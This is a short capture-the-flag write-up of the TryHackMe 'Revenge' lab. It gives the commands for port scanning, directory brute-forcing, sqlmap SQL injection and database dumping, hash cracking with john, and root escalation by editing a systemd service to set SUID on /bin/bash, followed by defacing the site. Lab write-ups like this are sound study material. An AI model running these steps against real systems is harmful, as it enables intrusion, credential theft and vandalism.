Revenge — TryHackMe — WriteUp

4 min readNov 25, 2020


Hello. I’m Rahmos. Here is my Revenge — TryHackMe — WriteUp. Check it out!

First, let’s download Billy’s message.

Billy’s message

Well looks like he wants me to deface the website! Next up, deploy the machine and nmap for opened ports.

nmap -A -T4 -p- -v <ip>


There are 2 ports opened: 22 (SSH) and 80 (HTTP). First, let’s access the website.


I’ve checked the page source (Ctrl + U), but nothing valuable. Next, find hidden dirs and files using gobuster:

gobuster dir -u http://<ip>:80/ -w /path-to-wordlist


Let’s access /login:


and /admin:


Ok so there are 2 login pages: for customer and for admin. But I haven’t got any credential yet.

Look at the description:

Ok so I’ll use sqlmap to look for SQLi on this website:

sqlmap -u http://<ip>:80/products/1 — batch — current-db

**Why /products/1? Because it’s where the website will load the products from database and display in the website.


After a while, I’ve got the database name: “duckyinc”. Follow the database name to look for tables inside it:

sqlmap -u http://<ip>/products/1 — batch -D duckyinc — tables


And yes, I’ve found 3 tables inside “duckyinc” database. Let’s dump everything from that 3 tables:

sqlmap -u http://<ip>/products/1 — batch -D duckyinc — dump

Focus on the “user” table, you will see your 1st flag:

Now for the “system_user” table:


I’ve found credential of the server-admin. Let’s crack that hash password using john. It’s a Bcrypt hash. I will copy the hash password to a text file called “server_admin.txt”.

john — wordlist=rockyou.txt server_admin.txt


The password has been cracked! Let’s login at /admin using the credential:
server-admin : inuyasha

However, I cannot login! So what’s this password for? Let’s try SSH:

ssh server-admin@<ip>

Enter the password:


And that’s it! Now I’m into the machine. Find the flag:


Now I’ll find a way to own root to get the 3rd flag. First, sudo -l to see if server-admin can run sudo:

Because server-admin can edit the duckyinc.service, I will modify this service to get root:

sudoedit /etc/systemd/system/duckyinc.service

This is the original duckyinc.service

original duckyinc.service

This is the modified duckyinc.service.

modified duckyinc.service

So what the service does is that it will give /bin/bash SUID bit set. Save the file and then:

sudo systemctl daemon-reload

sudo systemctl restart duckyinc.service


/bin/bash -p


Now I’m root! Let’s cd root and see what’s inside:


Well there’s no flag here. So I need to deface the website to get the final flag.


cd /var/www/duckyinc/templates

Then edit the “index.html”:


After that, cd to /root and you will see flag3:


The end.




No responses yet